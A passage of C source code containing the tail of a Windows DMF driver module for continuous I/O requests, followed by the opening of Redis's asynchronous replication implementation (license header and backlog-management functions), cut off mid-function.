moduleConfigBufferPoolInput.Mode.SourceSettings.PoolType = moduleConfig->PoolTypeInput; moduleConfigBufferPoolInput.Mode.SourceSettings.BufferSize = moduleConfig->BufferInputSize; moduleConfigBufferPoolInput.Mode.SourceSettings.BufferContextSize = moduleConfig->BufferContextInputSize; moduleAttributes.ClientModuleInstanceName = "BufferPoolInput"; moduleAttributes.PassiveLevel = DmfParentModuleAttributes->PassiveLevel; DMF_DmfModuleAdd(DmfModuleInit, &moduleAttributes, WDF_NO_OBJECT_ATTRIBUTES, &moduleContext->DmfModuleBufferPoolInput); } else { DmfAssert(moduleConfig->BufferCountInput == 0); } if (moduleConfig->BufferOutputSize > 0) { // BufferPoolOutput // ---------------- // DMF_CONFIG_BufferPool_AND_ATTRIBUTES_INIT(&moduleConfigBufferPoolOutput, &moduleAttributes); moduleConfigBufferPoolOutput.BufferPoolMode = BufferPool_Mode_Source; moduleConfigBufferPoolOutput.Mode.SourceSettings.EnableLookAside = moduleConfig->EnableLookAsideOutput; moduleConfigBufferPoolOutput.Mode.SourceSettings.BufferCount = moduleConfig->BufferCountOutput; moduleConfigBufferPoolOutput.Mode.SourceSettings.PoolType = moduleConfig->PoolTypeOutput; moduleConfigBufferPoolOutput.Mode.SourceSettings.BufferSize = moduleConfig->BufferOutputSize; moduleConfigBufferPoolOutput.Mode.SourceSettings.BufferContextSize = moduleConfig->BufferContextOutputSize; moduleAttributes.ClientModuleInstanceName = "BufferPoolOutput"; moduleAttributes.PassiveLevel = DmfParentModuleAttributes->PassiveLevel; DMF_DmfModuleAdd(DmfModuleInit, &moduleAttributes, WDF_NO_OBJECT_ATTRIBUTES, &moduleContext->DmfModuleBufferPoolOutput); } else { DmfAssert(moduleConfig->BufferCountOutput == 0); } // BufferPoolContext // ----------------- // DMF_CONFIG_BufferPool_AND_ATTRIBUTES_INIT(&moduleConfigBufferPoolContext, &moduleAttributes); moduleConfigBufferPoolContext.BufferPoolMode = BufferPool_Mode_Source; moduleConfigBufferPoolContext.Mode.SourceSettings.EnableLookAside = TRUE; moduleConfigBufferPoolContext.Mode.SourceSettings.BufferCount = 1; // NOTE: BufferPool context must always be NonPagedPool because it is accessed in the // completion routine running at DISPATCH_LEVEL. // moduleConfigBufferPoolContext.Mode.SourceSettings.PoolType = NonPagedPoolNx; moduleConfigBufferPoolContext.Mode.SourceSettings.BufferSize = sizeof(ContinuousRequestTarget_SingleAsynchronousRequestContext); moduleAttributes.ClientModuleInstanceName = "BufferPoolContext"; moduleAttributes.PassiveLevel = DmfParentModuleAttributes->PassiveLevel; DMF_DmfModuleAdd(DmfModuleInit, &moduleAttributes, WDF_NO_OBJECT_ATTRIBUTES, &moduleContext->DmfModuleBufferPoolContext); // QueuedWorkItemSingle // -------------------- // DMF_CONFIG_QueuedWorkItem_AND_ATTRIBUTES_INIT(&moduleConfigQueuedWorkItemSingle, &moduleAttributes); moduleConfigQueuedWorkItemSingle.BufferQueueConfig.SourceSettings.BufferCount = DEFAULT_NUMBER_OF_PENDING_PASSIVE_LEVEL_COMPLETION_ROUTINES; moduleConfigQueuedWorkItemSingle.BufferQueueConfig.SourceSettings.BufferSize = sizeof(ContinuousRequestTarget_QueuedWorkitemContext); // This has to be NonPagedPoolNx because completion routine runs at dispatch level. // moduleConfigQueuedWorkItemSingle.BufferQueueConfig.SourceSettings.PoolType = NonPagedPoolNx; moduleConfigQueuedWorkItemSingle.BufferQueueConfig.SourceSettings.EnableLookAside = TRUE; moduleConfigQueuedWorkItemSingle.EvtQueuedWorkitemFunction = ContinuousRequestTarget_QueuedWorkitemCallbackSingle; DMF_DmfModuleAdd(DmfModuleInit, &moduleAttributes, WDF_NO_OBJECT_ATTRIBUTES, &moduleContext->DmfModuleQueuedWorkitemSingle); if (DmfParentModuleAttributes->PassiveLevel) { moduleContext->CompletionRoutineStream = ContinuousRequestTarget_StreamCompletionRoutinePassive; // QueuedWorkItemStream // -------------------- // DMF_CONFIG_QueuedWorkItem_AND_ATTRIBUTES_INIT(&moduleConfigQueuedWorkItemStream, &moduleAttributes); moduleConfigQueuedWorkItemStream.BufferQueueConfig.SourceSettings.BufferCount = DEFAULT_NUMBER_OF_PENDING_PASSIVE_LEVEL_COMPLETION_ROUTINES; moduleConfigQueuedWorkItemStream.BufferQueueConfig.SourceSettings.BufferSize = sizeof(ContinuousRequestTarget_QueuedWorkitemContext); // This has to be NonPagedPoolNx because completion routine runs at dispatch level. // moduleConfigQueuedWorkItemStream.BufferQueueConfig.SourceSettings.PoolType = NonPagedPoolNx; moduleConfigQueuedWorkItemStream.BufferQueueConfig.SourceSettings.EnableLookAside = TRUE; moduleConfigQueuedWorkItemStream.EvtQueuedWorkitemFunction = ContinuousRequestTarget_QueuedWorkitemCallbackStream; DMF_DmfModuleAdd(DmfModuleInit, &moduleAttributes, WDF_NO_OBJECT_ATTRIBUTES, &moduleContext->DmfModuleQueuedWorkitemStream); } else { moduleContext->CompletionRoutineStream = ContinuousRequestTarget_StreamCompletionRoutine; } FuncExitVoid(DMF_TRACE); } #pragma code_seg() #pragma code_seg("PAGE") _IRQL_requires_max_(PASSIVE_LEVEL) _Must_inspect_result_ static NTSTATUS DMF_ContinuousRequestTarget_Open( _In_ DMFMODULE DmfModule ) /*++ Routine Description: Initialize an instance of a DMF Module of type ContinuousRequestTarget. Arguments: DmfModule - The given DMF Module. Return Value: STATUS_SUCCESS --*/ { NTSTATUS ntStatus; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; WDF_OBJECT_ATTRIBUTES objectAttributes; WDFDEVICE device; PAGED_CODE(); FuncEntry(DMF_TRACE); device = DMF_ParentDeviceGet(DmfModule); moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); // Streaming is not started yet. // moduleContext->Stopping = TRUE; #if !defined(DMF_USER_MODE) DMF_Portable_Rundown_Initialize(&moduleContext->StreamRequestsRundown); DMF_Portable_EventCreate(&moduleContext->StreamRequestsRundownCompletionEvent, NotificationEvent, FALSE); #endif WDF_OBJECT_ATTRIBUTES_INIT(&objectAttributes); objectAttributes.ParentObject = DmfModule; // This Collection contains all the requests that are created for streaming. These requests remain // in this collection until the Module is Closed. // ntStatus = WdfCollectionCreate(&objectAttributes, &moduleContext->CreatedStreamRequestsCollection); if (!NT_SUCCESS(ntStatus)) { goto Exit; } // These are the requests that need to be canceled prior to streaming stopping. // ntStatus = WdfCollectionCreate(&objectAttributes, &moduleContext->TransientStreamRequestsCollection); if (!NT_SUCCESS(ntStatus)) { goto Exit; } // It is possible for Client to instantiate this Module without using streaming. // if (moduleConfig->ContinuousRequestCount > 0) { for (UINT requestIndex = 0; requestIndex < moduleConfig->ContinuousRequestCount; requestIndex++) { WDF_OBJECT_ATTRIBUTES requestAttributes; WDFREQUEST request; WDF_OBJECT_ATTRIBUTES_INIT(&requestAttributes); // The request is being parented to the device explicitly to handle deletion. // When a dynamic module tree is deleted, the child objects are deleted first before the parent. // So, if request is a child of this module and this module gets implicitly deleted, // the requests get the delete operation first. And if the reqeust is already sent to an IO Target, // WDF verifier complains about it. // Thus request is parented to device, and are deleted when the collection is deleted in DMF close callback. // requestAttributes.ParentObject = device; ntStatus = WdfRequestCreate(&requestAttributes, moduleContext->IoTarget, &request); if (!NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestCreate fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } ntStatus = WdfCollectionAdd(moduleContext->CreatedStreamRequestsCollection, request); if (!NT_SUCCESS(ntStatus)) { WdfObjectDelete(request); goto Exit; } } } #if !defined(DMF_USER_MODE) else { DMF_Portable_EventSet(&moduleContext->StreamRequestsRundownCompletionEvent); ntStatus = STATUS_SUCCESS; } #endif Exit: if (!NT_SUCCESS(ntStatus)) { if(moduleContext->CreatedStreamRequestsCollection != NULL) { ContinuousRequestTarget_DeleteStreamRequestsFromCollection(moduleContext); WdfObjectDelete(moduleContext->CreatedStreamRequestsCollection); moduleContext->CreatedStreamRequestsCollection = NULL; } if(moduleContext->TransientStreamRequestsCollection != NULL) { WdfObjectDelete(moduleContext->TransientStreamRequestsCollection); moduleContext->TransientStreamRequestsCollection = NULL; } } FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return ntStatus; } #pragma code_seg() #pragma code_seg("PAGE") _IRQL_requires_max_(PASSIVE_LEVEL) static VOID DMF_ContinuousRequestTarget_Close( _In_ DMFMODULE DmfModule ) /*++ Routine Description: Uninitialize an instance of a DMF Module of type ContinuousRequestTarget. Arguments: DmfModule - The given DMF Module. Return Value: None --*/ { DMF_CONTEXT_ContinuousRequestTarget* moduleContext; PAGED_CODE(); FuncEntry(DMF_TRACE); moduleContext = DMF_CONTEXT_GET(DmfModule); // NOTE: Do not stop streaming here because this can happen after Release Hardware!. // In that case, cancellation of requests works in an undefined manner. // Streaming *must* be stopped when this callback happens! // DmfAssert(moduleContext->Stopping); // There is no need to verify that IoTarget is NULL. Client may not clear it because it is // not necessary to do so. // // Clean up resources created in Open. // if (moduleContext->TransientStreamRequestsCollection != NULL) { DmfAssert(WdfCollectionGetCount(moduleContext->TransientStreamRequestsCollection) == 0); WdfObjectDelete(moduleContext->TransientStreamRequestsCollection); moduleContext->TransientStreamRequestsCollection = NULL; } if (moduleContext->CreatedStreamRequestsCollection != NULL) { ContinuousRequestTarget_DeleteStreamRequestsFromCollection(moduleContext); WdfObjectDelete(moduleContext->CreatedStreamRequestsCollection); moduleContext->CreatedStreamRequestsCollection = NULL; } FuncExitVoid(DMF_TRACE); } #pragma code_seg() /////////////////////////////////////////////////////////////////////////////////////////////////////// // Public Calls by Client /////////////////////////////////////////////////////////////////////////////////////////////////////// // #pragma code_seg("PAGE") _IRQL_requires_max_(PASSIVE_LEVEL) _Must_inspect_result_ NTSTATUS DMF_ContinuousRequestTarget_Create( _In_ WDFDEVICE Device, _In_ DMF_MODULE_ATTRIBUTES* DmfModuleAttributes, _In_ WDF_OBJECT_ATTRIBUTES* ObjectAttributes, _Out_ DMFMODULE* DmfModule ) /*++ Routine Description: Create an instance of a DMF Module of type ContinuousRequestTarget. Arguments: Device - Client's WDFDEVICE object. DmfModuleAttributes - Opaque structure that contains parameters DMF needs to initialize the Module. ObjectAttributes - WDF object attributes for DMFMODULE. DmfModule - Address of the location where the created DMFMODULE handle is returned. Return Value: NTSTATUS --*/ { NTSTATUS ntStatus; DMF_MODULE_DESCRIPTOR dmfModuleDescriptor_ContinuousRequestTarget; DMF_CALLBACKS_WDF dmfCallbacksWdf_ContinuousRequestTarget; DMF_CALLBACKS_DMF dmfCallbacksDmf_ContinuousRequestTarget; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; PAGED_CODE(); FuncEntry(DMF_TRACE); moduleConfig = (DMF_CONFIG_ContinuousRequestTarget*)DmfModuleAttributes->ModuleConfigPointer; DMF_CALLBACKS_DMF_INIT(&dmfCallbacksDmf_ContinuousRequestTarget); dmfCallbacksDmf_ContinuousRequestTarget.ChildModulesAdd = DMF_ContinuousRequestTarget_ChildModulesAdd; dmfCallbacksDmf_ContinuousRequestTarget.DeviceOpen = DMF_ContinuousRequestTarget_Open; dmfCallbacksDmf_ContinuousRequestTarget.DeviceClose = DMF_ContinuousRequestTarget_Close; DMF_MODULE_DESCRIPTOR_INIT_CONTEXT_TYPE(dmfModuleDescriptor_ContinuousRequestTarget, ContinuousRequestTarget, DMF_CONTEXT_ContinuousRequestTarget, DMF_MODULE_OPTIONS_DISPATCH_MAXIMUM, DMF_MODULE_OPEN_OPTION_OPEN_Create); dmfModuleDescriptor_ContinuousRequestTarget.CallbacksDmf = &dmfCallbacksDmf_ContinuousRequestTarget; if (moduleConfig->PurgeAndStartTargetInD0Callbacks) { DmfAssert(DmfModuleAttributes->DynamicModule == FALSE); DMF_CALLBACKS_WDF_INIT(&dmfCallbacksWdf_ContinuousRequestTarget); dmfCallbacksWdf_ContinuousRequestTarget.ModuleD0Entry = DMF_ContinuousRequestTarget_ModuleD0Entry; dmfCallbacksWdf_ContinuousRequestTarget.ModuleD0Exit = DMF_ContinuousRequestTarget_ModuleD0Exit; dmfModuleDescriptor_ContinuousRequestTarget.CallbacksWdf = &dmfCallbacksWdf_ContinuousRequestTarget; } ntStatus = DMF_ModuleCreate(Device, DmfModuleAttributes, ObjectAttributes, &dmfModuleDescriptor_ContinuousRequestTarget, DmfModule); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "DMF_ModuleCreate fails: ntStatus=%!STATUS!", ntStatus); } FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return(ntStatus); } #pragma code_seg() // Module Methods // _IRQL_requires_max_(DISPATCH_LEVEL) VOID DMF_ContinuousRequestTarget_BufferPut( _In_ DMFMODULE DmfModule, _In_ VOID* ClientBuffer ) /*++ Routine Description: Add the output buffer back to OutputBufferPool. Arguments: DmfModule - This Module's handle. ClientBuffer - The buffer to add to the list. NOTE: This must be a properly formed buffer that was created by this Module. Return Value: None --*/ { DMF_CONTEXT_ContinuousRequestTarget* moduleContext; FuncEntry(DMF_TRACE); DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget); moduleContext = DMF_CONTEXT_GET(DmfModule); DMF_BufferPool_Put(moduleContext->DmfModuleBufferPoolOutput, ClientBuffer); FuncExitVoid(DMF_TRACE); } _IRQL_requires_max_(DISPATCH_LEVEL) VOID DMF_ContinuousRequestTarget_IoTargetClear( _In_ DMFMODULE DmfModule ) /*++ Routine Description: Clears the IoTarget. Arguments: DmfModule - This Module's handle. Return Value: VOID --*/ { DMF_CONTEXT_ContinuousRequestTarget* moduleContext; FuncEntry(DMF_TRACE); DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget); moduleContext = DMF_CONTEXT_GET(DmfModule); DmfAssert(moduleContext->IoTarget != NULL); DmfAssert(moduleContext->Stopping); moduleContext->IoTarget = NULL; FuncExitVoid(DMF_TRACE); } _IRQL_requires_max_(DISPATCH_LEVEL) NTSTATUS DMF_ContinuousRequestTarget_IoTargetSet( _In_ DMFMODULE DmfModule, _In_ WDFIOTARGET IoTarget ) /*++ Routine Description: Set the IoTarget to Send Requests to. Arguments: DmfModule - This Module's handle. IoTarget - IO Target to send requests to. Return Value: VOID --*/ { NTSTATUS ntStatus; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; FuncEntry(DMF_TRACE); DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget); ntStatus = STATUS_SUCCESS; moduleContext = DMF_CONTEXT_GET(DmfModule); DmfAssert(IoTarget != NULL); DmfAssert(moduleContext->IoTarget == NULL); moduleContext->IoTarget = IoTarget; FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return ntStatus; } _IRQL_requires_max_(DISPATCH_LEVEL) NTSTATUS DMF_ContinuousRequestTarget_Send( _In_ DMFMODULE DmfModule, _In_reads_bytes_(RequestLength) VOID* RequestBuffer, _In_ size_t RequestLength, _Out_writes_bytes_(ResponseLength) VOID* ResponseBuffer, _In_ size_t ResponseLength, _In_ ContinuousRequestTarget_RequestType RequestType, _In_ ULONG RequestIoctl, _In_ ULONG RequestTimeoutMilliseconds, _In_opt_ EVT_DMF_ContinuousRequestTarget_SendCompletion* EvtContinuousRequestTargetSingleAsynchronousRequest, _In_opt_ VOID* SingleAsynchronousRequestClientContext ) /*++ Routine Description: Creates and sends a Asynchronous request to the IoTarget given a buffer, IOCTL and other information. Arguments: DmfModule - This Module's handle. RequestBuffer - Buffer of data to attach to request to be sent. RequestLength - Number of bytes to in RequestBuffer to send. ResponseBuffer - Buffer of data that is returned by the request. ResponseLength - Size of Response Buffer in bytes. RequestType - Read or Write or Ioctl RequestIoctl - The given IOCTL. RequestTimeoutMilliseconds - Timeout value in milliseconds of the transfer or zero for no timeout. EvtContinuousRequestTargetSingleAsynchronousRequest - Callback to be called in completion routine. SingleAsynchronousRequestClientContext - Client context sent in callback Return Value: STATUS_SUCCESS if a buffer is added to the list. Other NTSTATUS if there is an error. --*/ { NTSTATUS ntStatus; ContinuousRequestTarget_CompletionOptions completionOption; FuncEntry(DMF_TRACE); ntStatus = STATUS_SUCCESS; DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget); ntStatus = DMF_ModuleReference(DmfModule); if (!NT_SUCCESS(ntStatus)) { goto Exit; } if (DMF_IsModulePassiveLevel(DmfModule)) { completionOption = ContinuousRequestTarget_CompletionOptions_Passive; } else { completionOption = ContinuousRequestTarget_CompletionOptions_Dispatch; } ntStatus = ContinuousRequestTarget_RequestCreateAndSend(DmfModule, FALSE, RequestBuffer, RequestLength, ResponseBuffer, ResponseLength, RequestType, RequestIoctl, RequestTimeoutMilliseconds, completionOption, NULL, EvtContinuousRequestTargetSingleAsynchronousRequest, SingleAsynchronousRequestClientContext); if (! NT_SUCCESS(ntStatus)) { DMF_ModuleDereference(DmfModule); TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_RequestCreateAndSend fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } Exit: return ntStatus; } _IRQL_requires_max_(DISPATCH_LEVEL) NTSTATUS DMF_ContinuousRequestTarget_SendEx( _In_ DMFMODULE DmfModule, _In_reads_bytes_(RequestLength) VOID* RequestBuffer, _In_ size_t RequestLength, _Out_writes_bytes_(ResponseLength) VOID* ResponseBuffer, _In_ size_t ResponseLength, _In_ ContinuousRequestTarget_RequestType RequestType, _In_ ULONG RequestIoctl, _In_ ULONG RequestTimeoutMilliseconds, _In_ ContinuousRequestTarget_CompletionOptions CompletionOption, _In_opt_ EVT_DMF_ContinuousRequestTarget_SendCompletion* EvtContinuousRequestTargetSingleAsynchronousRequest, _In_opt_ VOID* SingleAsynchronousRequestClientContext ) /*++ Routine Description: Creates and sends a Asynchronous request to the IoTarget given a buffer, IOCTL and other information. Once the request is complete, EvtContinuousRequestTargetSingleAsynchronousRequest will be called at passive level. Arguments: DmfModule - This Module's handle. RequestBuffer - Buffer of data to attach to request to be sent. RequestLength - Number of bytes to in RequestBuffer to send. ResponseBuffer - Buffer of data that is returned by the request. ResponseLength - Size of Response Buffer in bytes. RequestType - Read or Write or Ioctl RequestIoctl - The given IOCTL. RequestTimeoutMilliseconds - Timeout value in milliseconds of the transfer or zero for no timeout. EvtContinuousRequestTargetSingleAsynchronousRequest - Callback to be called in completion routine. SingleAsynchronousRequestClientContext - Client context sent in callback Return Value: STATUS_SUCCESS if a buffer is added to the list. Other NTSTATUS if there is an error. --*/ { NTSTATUS ntStatus = STATUS_SUCCESS; FuncEntry(DMF_TRACE); DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget); ntStatus = DMF_ModuleReference(DmfModule); if (!NT_SUCCESS(ntStatus)) { goto Exit; } ntStatus = ContinuousRequestTarget_RequestCreateAndSend(DmfModule, FALSE, RequestBuffer, RequestLength, ResponseBuffer, ResponseLength, RequestType, RequestIoctl, RequestTimeoutMilliseconds, CompletionOption, NULL, EvtContinuousRequestTargetSingleAsynchronousRequest, SingleAsynchronousRequestClientContext); if (! NT_SUCCESS(ntStatus)) { DMF_ModuleDereference(DmfModule); TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_RequestCreateAndSend fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } Exit: return ntStatus; } _IRQL_requires_max_(DISPATCH_LEVEL) NTSTATUS DMF_ContinuousRequestTarget_SendSynchronously( _In_ DMFMODULE DmfModule, _In_reads_bytes_(RequestLength) VOID* RequestBuffer, _In_ size_t RequestLength, _Out_writes_bytes_(ResponseLength) VOID* ResponseBuffer, _In_ size_t ResponseLength, _In_ ContinuousRequestTarget_RequestType RequestType, _In_ ULONG RequestIoctl, _In_ ULONG RequestTimeoutMilliseconds, _Out_opt_ size_t* BytesWritten ) /*++ Routine Description: Creates and sends a synchronous request to the IoTarget given a buffer, IOCTL and other information. Arguments: DmfModule - This Module's handle. RequestBuffer - Buffer of data to attach to request to be sent. RequestLength - Number of bytes to in RequestBuffer to send. ResponseBuffer - Buffer of data that is returned by the request. ResponseLength - Size of Response Buffer in bytes. RequestType - Read or Write or Ioctl RequestIoctl - The given IOCTL. RequestTimeoutMilliseconds - Timeout value in milliseconds of the transfer or zero for no timeout. BytesWritten - Bytes returned by the transaction. Return Value: STATUS_SUCCESS if a buffer is added to the list. Other NTSTATUS if there is an error. --*/ { NTSTATUS ntStatus = STATUS_SUCCESS; FuncEntry(DMF_TRACE); DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget); ntStatus = ContinuousRequestTarget_RequestCreateAndSend(DmfModule, TRUE, RequestBuffer, RequestLength, ResponseBuffer, ResponseLength, RequestType, RequestIoctl, RequestTimeoutMilliseconds, ContinuousRequestTarget_CompletionOptions_Default, BytesWritten, NULL, NULL); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_RequestCreateAndSend fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } Exit: return ntStatus; } _IRQL_requires_max_(DISPATCH_LEVEL) NTSTATUS DMF_ContinuousRequestTarget_Start( _In_ DMFMODULE DmfModule ) /*++ Routine Description: Starts streaming Asynchronous requests to the IoTarget. Arguments: DmfModule - This Module's handle. Return Value: STATUS_SUCCESS if a buffer is added to the list. Other NTSTATUS if there is an error. --*/ { NTSTATUS ntStatus; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; FuncEntry(DMF_TRACE); DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget); moduleConfig = DMF_CONFIG_GET(DmfModule); moduleContext = DMF_CONTEXT_GET(DmfModule); ntStatus = STATUS_SUCCESS; DmfAssert(moduleContext->Stopping); // Clear the Stopped flag as streaming will now start. // moduleContext->Stopping = FALSE; #if !defined(DMF_USER_MODE) // In case it was previous stopped, re-initialize fields used for rundown. // DMF_Portable_EventReset(&moduleContext->StreamRequestsRundownCompletionEvent); DMF_Portable_Rundown_Reinitialize(&moduleContext->StreamRequestsRundown); #endif moduleContext->StreamingRequestCount = moduleConfig->ContinuousRequestCount; for (UINT requestIndex = 0; requestIndex < moduleConfig->ContinuousRequestCount; requestIndex++) { WDFREQUEST request; request = (WDFREQUEST)WdfCollectionGetItem(moduleContext->CreatedStreamRequestsCollection, requestIndex); DmfAssert(request != NULL); // Add it to the list of Transient requests a single time when Streaming starts. // ntStatus = WdfCollectionAdd(moduleContext->TransientStreamRequestsCollection, request); if (NT_SUCCESS(ntStatus)) { // Actually send the Request down. // ntStatus = ContinuousRequestTarget_StreamRequestSend(DmfModule, request); } if (! NT_SUCCESS(ntStatus)) { #if !defined(DMF_USER_MODE) // Subtract the rest of stream requests yet to start. // while (requestIndex++ < moduleConfig->ContinuousRequestCount) { ContinuousRequestTarget_DecreaseStreamRequestCount(moduleContext); } #endif TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_StreamRequestSend fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } } Exit: return ntStatus; } _IRQL_requires_max_(PASSIVE_LEVEL) VOID DMF_ContinuousRequestTarget_Stop( _In_ DMFMODULE DmfModule ) /*++ Routine Description: Stops streaming Asynchronous requests to the IoTarget and Cancels all the existing requests. Arguments: DmfModule - This Module's handle. Return Value: None --*/ { DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; NTSTATUS ntStatus; FuncEntry(DMF_TRACE); DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget); moduleConfig = DMF_CONFIG_GET(DmfModule); moduleContext = DMF_CONTEXT_GET(DmfModule); ntStatus = DMF_ModuleReference(DmfModule); if (!NT_SUCCESS(ntStatus)) { DmfAssert(FALSE); goto Exit; } // Tell the rest of the Module that Client has stopped streaming. // (It is possible this is called twice if removal of WDFIOTARGET occurs on stream that starts/stops // automatically. // moduleContext->Stopping = TRUE; // Cancel all requests from target. Do not wait until all pending requests have returned. // ContinuousRequestTarget_RequestsCancel(DmfModule); DMF_ModuleDereference(DmfModule); DmfAssert(moduleContext->IoTarget != NULL); Exit: ; } _IRQL_requires_max_(PASSIVE_LEVEL) VOID DMF_ContinuousRequestTarget_StopAndWait( _In_ DMFMODULE DmfModule ) /*++ Routine Description: Stops streaming Asynchronous requests to the IoTarget and waits for all pending requests to return. Arguments: DmfModule - This Module's handle. Return Value: None --*/ { DMF_CONTEXT_ContinuousRequestTarget* moduleContext; NTSTATUS ntStatus; FuncEntry(DMF_TRACE); DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget); moduleContext = DMF_CONTEXT_GET(DmfModule); ntStatus = DMF_ModuleReference(DmfModule); if (!NT_SUCCESS(ntStatus)) { DmfAssert(FALSE); goto Exit; } // Stop Streaming. This is an internal function in case needs to be called in the future. // ContinuousRequestTarget_StopAndWait(DmfModule); DMF_ModuleDereference(DmfModule); Exit: FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); } // eof: Dmf_ContinuousRequestTarget.c //
900817.c
/* Asynchronous replication implementation. * * Copyright (c) 2009-2012, Salvatore Sanfilippo <antirez at gmail dot com> * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * * Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * Neither the name of Redis nor the names of its contributors may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. */ #include "server.h" #include <sys/time.h> #include <unistd.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/stat.h> void replicationDiscardCachedMaster(void); void replicationResurrectCachedMaster(int newfd); void replicationSendAck(void); void putSlaveOnline(client *slave); int cancelReplicationHandshake(void); /* --------------------------- Utility functions ---------------------------- */ /* Return the pointer to a string representing the slave ip:listening_port * pair. Mostly useful for logging, since we want to log a slave using its * IP address and its listening port which is more clear for the user, for * example: "Closing connection with slave 10.1.2.3:6380". */ char *replicationGetSlaveName(client *c) { static char buf[NET_PEER_ID_LEN]; char ip[NET_IP_STR_LEN]; ip[0] = '\0'; buf[0] = '\0'; if (c->slave_ip[0] != '\0' || anetPeerToString(c->fd,ip,sizeof(ip),NULL) != -1) { /* Note that the 'ip' buffer is always larger than 'c->slave_ip' */ if (c->slave_ip[0] != '\0') memcpy(ip,c->slave_ip,sizeof(c->slave_ip)); if (c->slave_listening_port) anetFormatAddr(buf,sizeof(buf),ip,c->slave_listening_port); else snprintf(buf,sizeof(buf),"%s:<unknown-slave-port>",ip); } else { snprintf(buf,sizeof(buf),"client id #%llu", (unsigned long long) c->id); } return buf; } /* ---------------------------------- MASTER -------------------------------- */ void createReplicationBacklog(void) { serverAssert(server.repl_backlog == NULL); server.repl_backlog = zmalloc(server.repl_backlog_size); server.repl_backlog_histlen = 0; server.repl_backlog_idx = 0; /* We don't have any data inside our buffer, but virtually the first * byte we have is the next byte that will be generated for the * replication stream. */ server.repl_backlog_off = server.master_repl_offset+1; } /* This function is called when the user modifies the replication backlog * size at runtime. It is up to the function to both update the * server.repl_backlog_size and to resize the buffer and setup it so that * it contains the same data as the previous one (possibly less data, but * the most recent bytes, or the same data and more free space in case the * buffer is enlarged). */ void resizeReplicationBacklog(long long newsize) { if (newsize < CONFIG_REPL_BACKLOG_MIN_SIZE) newsize = CONFIG_REPL_BACKLOG_MIN_SIZE; if (server.repl_backlog_size == newsize) return; server.repl_backlog_size = newsize; if (server.repl_backlog != NULL) { /* What we actually do is to flush the old buffer and realloc a new * empty one. It will refill with new data incrementally. * The reason is that copying a few gigabytes adds latency and even * worse often we need to alloc additional space before freeing the * old buffer. */ zfree(server.repl_backlog); server.repl_backlog = zmalloc(server.repl_backlog_size); server.repl_backlog_histlen = 0; server.repl_backlog_idx = 0; /* Next byte we have is... the next since the buffer is empty. */ server.repl_backlog_off = server.master_repl_offset+1; } } void freeReplicationBacklog(void) { serverAssert(listLength(server.slaves) == 0); zfree(server.repl_backlog); server.repl_backlog = NULL; } /* Add data to the replication backlog. * This function also increments the global replication offset stored at * server.master_repl_offset, because there is no case where we want to feed * the backlog without incrementing the offset. */ void feedReplicationBacklog(void *ptr, size_t len) { unsigned char *p = ptr; server.master_repl_offset += len; /* This is a circular buffer, so write as much data we can at every * iteration and rewind the "idx" index if we reach the 